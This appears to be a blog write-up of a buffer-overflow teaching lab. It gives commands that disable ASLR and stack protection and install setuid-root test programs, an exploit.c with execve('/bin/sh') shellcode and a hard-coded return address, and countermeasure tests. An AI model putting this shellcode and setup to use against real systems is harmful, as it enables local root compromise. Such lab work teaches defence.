Buffer overflow 定义 Buffer overflow is defined as the condition in which a program attempts to write data beyond the boundaries of pre-allocated fixed length buffers.
缓冲区溢出存在的问题 This vulnerability can be utilized by a malicious user to alter the flow control of the program, even execute arbitrary pieces of code. This vulnerability arises due to the mixing of the storage for data (e.g. buffers) and the storage for controls (e.g. return addresses): an overflow in the data part can affect the control flow of the program, because an overflow can change the return address.
The task is to develop a scheme to exploit the vulnerability and finally gain the root privilege. In addition to the attacks, students will be guided to walk through several protection schemes that have been implemented in the operating system to counter against buffer-overflow attacks. Students need to evaluate whether the schemes work or not and explain why.
sudo sysctl -w kernel.randomize_va_space=0
sudo rm /bin/sh
sudo ln -s /bin/zsh /bin/sh
gcc -z execstack -o call_shellcode call_shellcode.c
sudo sysctl -w kernel.randomize_va_space=0
sudo rm /bin/sh
sudo ln -s /bin/zsh /bin/sh
gcc -o stack -z execstack -fno-stack-protector stack.c
sudo chown root stack
sudo chmod 4755 stack # chmod 4755 filename可使此程序具有root的权限
gcc -o exploit exploit.c
exploit.c
/* exploit.c */
/* A program that creates a file containing code for launching shell*/
#include <stdlib.h>
#include <stdio.h>
#include <string.h>
char shellcode[]=
"\x31\xc0" /* xorl %eax,%eax */
"\x50" /* pushl %eax */
"\x68""//sh" /* pushl $0x68732f2f */
"\x68""/bin" /* pushl $0x6e69622f */
"\x89\xe3" /* movl %esp,%ebx */
"\x50" /* pushl %eax */
"\x53" /* pushl %ebx */
"\x89\xe1" /* movl %esp,%ecx */
"\x99" /* cdq */
"\xb0\x0b" /* movb $0x0b,%al */
"\xcd\x80" /* int $0x80 */
;
void main(int argc, char **argv)
{
char buffer[517];
FILE *badfile;
/* Initialize buffer with 0x90 (NOP instruction) */
memset(&buffer, 0x90, 517);
/* You need to fill the buffer with appropriate contents here */
strcpy(buffer + 100, shellcode); //将shellcode拷贝至buffer
strcpy(buffer + 0x24, "\x5c\xeb\xff\xbf"); //在buffer特定偏移处起始的四个字节覆盖sellcode地址
/* Save the contents to the file "badfile" */
badfile = fopen("./badfile", "w");
fwrite(buffer, 517, 1, badfile);
fclose(badfile);
}
sudo rm /bin/sh
sudo ln -s /bin/dash /bin/sh
gcc dash_shell_test.c -o dash_shell_test
sudo chown root dash_shell_test
sudo chmod 4755 dash_shell_test
gcc -o exploit_task3 exploit_task3.c
sudo /sbin/sysctl -w kernel.randomize_va_space=2
sh task4.sh
sudo sysctl -w kernel.randomize_va_space=0
gcc -o stack -z execstack stack.c
sudo chown root stack
sudo chmod 4755 stack
sudo sysctl -w kernel.randomize_va_space=0
gcc -o stack -fno-stack-protector -z noexecstack stack.c
sudo chown root stack
sudo chmod 4755 stack
手机扫一扫
移动阅读更方便
你可能感兴趣的文章